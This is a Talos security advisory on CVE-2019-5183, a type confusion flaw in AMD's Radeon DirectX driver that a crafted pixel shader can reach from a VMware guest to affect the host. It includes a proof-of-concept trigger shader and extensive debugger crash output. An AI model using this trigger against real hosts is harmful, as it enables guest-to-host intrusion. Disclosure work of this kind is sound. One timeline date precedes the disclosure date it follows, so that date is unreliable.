Talos Vulnerability Report

TALOS-2019-0964

AMD ATI Radeon ATIDXX64.DLL shader functionality VTABLE remote code execution vulnerability

January 21, 2020
CVE Number

CVE-2019-5183

Summary

An exploitable type confusion vulnerability exists in AMD ATIDXX64.DLL driver, versions 26.20.13031.10003, 26.20.13031.15006 and 26.20.13031.18002. A specially crafted pixel shader can cause a type confusion issue, leading to potential code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.

Tested Versions

AMD ATIDXX64.DLL (26.20.13031.10003, 26.20.13031.15006, 26.20.13031.18002) running on Radeon RX 550 / 550 Series VMware Workstation 15 (15.5.0 build-14665864) with Windows 10 x64 as guestVM

Product URLs

http://amd.com http://vmware.com

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-843: Access of Resource Using Incompatible Type (‘Type Confusion’)

Details

This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest operating system). Such attack can be triggered from VMware guest usermode. The vulnerability will be triggered in the vmware-vmx.exe process on host, or theoretically through WEBGL (remote website), leading to potential code execution (through a vtable type-confusion).

Example of a fuzzer-generated shader:

ps_4_0
dcl_input_ps_siv constant v0.xyzw, position
dcl_output o0.xyzw
mov r262.xyz, v0.xyzw
mov r0.xyzw, r262.xyzw
mad r4.xy, r0.xyyy, r5.xyyy, l(-1.000000, -1.000000, -1.000000, -1.000000)
mul r3.xy, r4.xyyy, r2.xyyy
loop
  lt r15.x, r3.xxxx, l(0.950000, 0.950000, 0.950000, 0.950000)
  and r16.x, r14.xxxx, r15.xxxx
  not r17.x, r16.xxxx
  if_nz r17.x
    break
  endif
  if_nz r253.x
    add r4.xyz, r4.xyzz, r257.xxxx
    add r3.x, r3.xxxx, r256.xxxx
  endif
  add r3.x, r3.xxxx, l(0.005000, 0.005000, 0.005000, 0.005000)
endloop
mov r1.xyz, r4.xyzx
mov o0.xyzw, r1.xyzw

When supplying a specifically crafted shader it is possible to “exceed” the vtable bounds and cause arbitrary code execution.
When a legitimate vtable address is supplied (1711F98 ??_7SCInst@@6B@ dq offset sub_3146A0), no such exception occurs, due to the fact that vtable bounds will not be exceeded and the correct function/method will be executed. However, after various further modifications of the shader, it is possible to execute different arbitrary vtable methods (attacker can semi-control the control flow). This leads to potential code execution.

Debugger output:

This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007fff`af02c1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007fff`b0434b40=6564616853343675
0:000> r
rax=00007fffb0434940 rbx=00000000ffffffff rcx=0000023d26c7ad70
rdx=0000080080000e02 rsi=0000023d26c7ad70 rdi=ffffffffffffffff
rip=00007fffaf02c1f2 rsp=000000e273af9590 rbp=0000023d26c7b0b0
 r8=0000023d26c45500  r9=0000000000000008 r10=0000000000000000
r11=0000000000000000 r12=0000000000000004 r13=0000023d26c7ae18
r14=0000023d26c45500 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007fff`af02c1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007fff`b0434b40=6564616853343675

        
0:000> db poi(@rax+0x200)
65646168`53343675  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
65646168`53343685  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    
0:000> db @rax+0x200
00007fff`b0434b40  75 36 34 53 68 61 64 65-72 49 64 00 00 00 00 00  u64ShaderId.....
00007fff`b0434b50  73 68 61 64 65 72 49 64-2e 75 36 34 48 69 00 00  shaderId.u64Hi..

Crash Information

This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(249c.1f6c): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
ntdll!NtGetContextThread+0x14:
00007ffe`9525de54 c3              ret
0:016> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for amdihk64.dll

KEY_VALUES_STRING: 1

    Key  : AV.Fault
    Value: Read

    Key  : Analysis.CPU.Sec
    Value: 4

    Key  : Analysis.DebugAnalysisProvider.CPP
    Value: Create: 8007007e on CLAB

    Key  : Analysis.DebugData
    Value: CreateObject

    Key  : Analysis.DebugModel
    Value: CreateObject

    Key  : Analysis.Elapsed.Sec
    Value: 51

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 161

    Key  : Analysis.System
    Value: CreateObject

    Key  : Timeline.Process.Start.DeltaSec
    Value: 195


APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  (.ecxr)
rax=00007ffe8a7a0560 rbx=00000000ffffffff rcx=000001cbbeeffc10
rdx=0000080080000e02 rsi=000001cbbeeffc10 rdi=ffffffffffffffff
rip=00007ffe893bc1f2 rsp=000000c7736f57f0 rbp=000001cbbeefff50
 r8=000001cbb28a0880  r9=0000000000000008 r10=0000000000000000
r11=0000000000000000 r12=0000000000000004 r13=000001cbbeeffcb8
r14=000001cbb28a0880 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007ffe`893bc1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007ffe`8a7a0760=6564616853343675
Resetting default scope

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffe893bc1f2 (atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000281ec2)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

PROCESS_NAME:  vmware-vmx.exe

READ_ADDRESS:  ffffffffffffffff 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  ffffffffffffffff

STACK_TEXT:  




000000c7`736f57f0 00007ffe`893bd32e : 000001cb`beefff50 000001cb`00000000 000001cb`b28a0880 000001cb`beee1048 : atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2
000000c7`736f58d0 00007ffe`89230beb : 000001cb`beef8c28 000001cb`b2872900 000001cb`beefb8d0 000001cb`beef8c00 : atidxx64!AmdDxGsaFreeCompiledShader+0x282ffe
000000c7`736f59b0 00007ffe`892323d9 : 000001cb`beef8c01 000000c7`00000000 000001cb`b2872900 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0xf68bb
000000c7`736f5a40 00007ffe`892477c6 : 000001cb`beee0de8 000001cb`bef00a30 000001cb`b28a08f0 000001cb`beee0de8 : atidxx64!AmdDxGsaFreeCompiledShader+0xf80a9
000000c7`736f5b80 00007ffe`89236880 : 000001cb`b28a0880 000001cb`beed8ec8 00000000`00000004 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0x10d496
000000c7`736f5d40 00007ffe`89215ad4 : 000001cb`b28a0880 000001cb`b2834a30 000000c7`736f6580 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc550
000000c7`736f5dc0 00007ffe`89159514 : 00000000`00000001 000000c7`736f6580 000001cb`b2834a30 000000c7`736f6580 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb7a4
000000c7`736f6340 00007ffe`898e1cf8 : 000001cb`ad350448 000000c7`736f6470 000000c7`736f6580 000001cb`ae696660 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f1e4
000000c7`736f6370 00007ffe`898c743b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a79c8
000000c7`736f64e0 00007ffe`898c6f72 : 00000000`00000000 000001cb`b2834730 000001cb`ae6b4890 000000c7`736fa1f0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78d10b
000000c7`736f6540 00007ffe`898f7983 : 000001cb`b2834730 00000000`00000000 000001cb`ae6f9e20 000000c7`736fa1f0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78cc42
000000c7`736fa1a0 00007ffe`898c6e47 : 00000000`00000047 000001cb`b28cdc00 000001cb`ae6e7370 000001cb`ae6c2560 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bd653
000000c7`736fa1d0 00007ffe`89996ac1 : 00000000`00000000 000000c7`736fa510 00000000`00000000 000001cb`bb9da450 : atidxx64!AmdDxGsaFreeCompiledShader+0x78cb17
000000c7`736fa230 00007ffe`89154e7a : 00000000`00000000 00000000`00000000 000000c7`736fa510 00000000`00000491 : atidxx64!AmdDxGsaFreeCompiledShader+0x85c791
000000c7`736fa270 00007ffe`89154cc3 : 000001cb`ae6dc850 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1ab4a
000000c7`736fa2b0 00007ffe`890dc05e : ffffffff`00000001 00000000`00000000 000001cb`bbe46ad8 00007ffe`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a993
000000c7`736fa340 00007ffe`89848276 : 00000000`00000000 000000c7`736fa510 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
000000c7`736fa380 00007ffe`890ed8b1 : 000001cb`bb8354c8 000001cb`bbe6f77c 000001cb`ad347210 00000000`00000001 : atidxx64!AmdDxGsaFreeCompiledShader+0x70df46
000000c7`736fa4f0 00007ffe`8f418edc : 00000000`00000000 000000c7`736fa720 000001cb`bb8354b8 00007ffe`951fba17 : atidxx64!XdxQueryTlsLookupTable+0x185c1
000000c7`736fa620 00007ffe`8f42295f : 000000c7`00000001 000001cb`ad343628 000001cb`bb8354b8 000001cb`ad339710 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
000000c7`736fa880 00007ffe`8f42289a : 000000c7`736faf60 00007ffe`8f5d2388 000001cb`bb835350 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
000000c7`736fa910 00007ffe`8f40ee58 : 000001cb`bb8353a8 000000c7`736faf60 000000c7`736faf90 00007ffe`8f5d2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
000000c7`736fa970 00007ffe`8f41b17d : 000001ca`00000000 000001cb`bb835350 00000000`00000000 000001ca`24e50000 : d3d11!CDevice::CreateLayeredChild+0xc88
000000c7`736fadb0 00007ffe`8f41b950 : 000001cb`bb835350 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
000000c7`736faf20 00007ffe`8f4014f4 : 000001cb`ad3378d0 00007ffe`00000009 000001cb`bbe6f6e0 000001cb`ad338108 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
000000c7`736fb110 00007ffe`8f401463 : 000001cb`bbe6f6e0 00000000`0000b000 000000c7`736fb470 00000000`00021c60 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
000000c7`736fb170 00007ffe`8f4011e8 : 000001cb`ad338108 000001cb`bbe6f6e0 00000000`0000039c 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
000000c7`736fb320 00007ff7`9ee1ef43 : 00000000`00000000 000000c7`736fb470 000001cb`ad6ad7f0 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
000000c7`736fb370 00007ff7`9ee20af6 : 00000000`00000000 000000c7`736ff5a0 000001cb`bbe46af0 000001cb`ad6ad7f0 : vmware_vmx+0x2bef43
000000c7`736fb4d0 00007ff7`9ee1fbc9 : 00007ff7`9eb60000 000001cb`ad6a8970 000001cb`ad6a8970 00000000`00000000 : vmware_vmx+0x2c0af6
000000c7`736ff4a0 00007ff7`9ee1cae1 : 000001cb`bbe1d810 00007ff7`9eb60000 00000000`00000003 00000000`00000003 : vmware_vmx+0x2bfbc9
000000c7`736ff9e0 00007ff7`9ee4eb06 : 000001cb`bbe1d770 00000000`0000000c 000001cb`bbe3b2f8 00000000`0000000c : vmware_vmx+0x2bcae1
000000c7`736ffa20 00007ff7`9ed52b8d : 00000000`00000100 000000c7`736ffbb0 00000000`00000028 000001cb`bbe1d760 : vmware_vmx+0x2eeb06
000000c7`736ffa60 00007ff7`9ecd1742 : 00000000`00007301 00000000`00000100 00000000`00000080 00000000`000000fc : vmware_vmx+0x1f2b8d
000000c7`736ffab0 00007ff7`9eccf358 : 00000000`00000000 00000000`00000001 000000c7`736ffcdc 00000000`00000040 : vmware_vmx+0x171742
000000c7`736ffc70 00007ff7`9ec1b45a : 00000000`00000000 00000000`00000002 00000000`00000002 000001ca`00000000 : vmware_vmx+0x16f358
000000c7`736ffca0 00007ff7`9f164e09 : 000001ca`27f61a10 00007ff7`9ec1b170 ffffffff`ffffffff 00000000`00000000 : vmware_vmx+0xbb45a
000000c7`736ffd10 00007ffe`94427bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x604e09
000000c7`736ffdd0 00007ffe`9522ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000c7`736ffe00 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


SYMBOL_NAME:  atidxx64!AmdDxGsaFreeCompiledShader+281ec2

MODULE_NAME: atidxx64

IMAGE_NAME:  atidxx64.dll

STACK_COMMAND:  ~16s ; .ecxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader

OS_VERSION:  10.0.18362.1

BUILDLAB_STR:  19h1_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {08b458dc-1323-2abb-9f1a-d0ac543a793c}

Followup:     MachineOwner
---------

0:016> .exr -1
ExceptionAddress: 00007ffe893bc1f2 (atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000281ec2)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

Timeline

2019-10-23 - Vendor Disclosure 2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.